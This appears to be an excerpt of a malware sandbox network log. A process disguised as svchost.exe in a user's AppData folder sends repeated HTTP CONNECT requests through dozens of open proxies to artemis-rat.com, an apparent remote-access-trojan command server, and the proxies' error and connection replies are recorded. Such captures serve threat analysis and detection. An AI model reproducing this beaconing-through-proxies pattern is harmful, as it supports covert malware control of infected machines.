Mar 9, 2024 13:14:31.925520897 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2790	192.168.2.5	59046	47.243.114.192	8180	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.772002935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2791	192.168.2.5	59051	83.229.61.198	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.772243023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.442779064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.442920923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.333657026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2792	192.168.2.5	59181	185.162.228.128	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.773232937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.928956985 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2793	192.168.2.5	59186	104.20.51.99	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.780108929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.935426950 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2794	192.168.2.5	59182	162.159.242.159	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.781481028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.943659067 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2795	192.168.2.5	59055	80.67.8.6	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.787033081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2796	192.168.2.5	59009	144.24.122.46	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.796230078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.645946026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.411675930 CET	805	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:33 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 613 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2797	192.168.2.5	59072	119.28.4.112	9999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.799066067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.115717888 CET	756	IN	HTTP/1.1 500 Internal Server Error Server: nginx/1.17.4 Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html; charset=utf-8 Content-Length: 579 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 37 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.17.4</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2798	192.168.2.5	59077	145.239.199.241	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.806766033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.117542982 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.2 Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2799	192.168.2.5	59066	194.247.173.17	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.806828976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2800	192.168.2.5	59087	81.250.223.126	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.813447952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.126178026 CET	805	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 613 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2801	192.168.2.5	59022	103.86.109.38	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.819396973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.240283012 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2802	192.168.2.5	59099	91.107.180.250	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.822287083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2803	192.168.2.5	59170	201.174.239.28	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.827078104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2804	192.168.2.5	56622	50.63.12.33	61464	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.846982002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.677073002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2805	192.168.2.5	58444	189.240.60.163	9090	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.849903107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.296745062 CET	72	IN	HTTP/1.1 200 Connection established Proxy-Agent: Fortinet-Proxy/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2806	192.168.2.5	58317	103.182.112.11	5000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.855633020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.282378912 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2807	192.168.2.5	59162	20.210.113.32	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.857579947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.123990059 CET	314	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: close Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2808	192.168.2.5	59193	192.154.244.92	9000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.858726978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
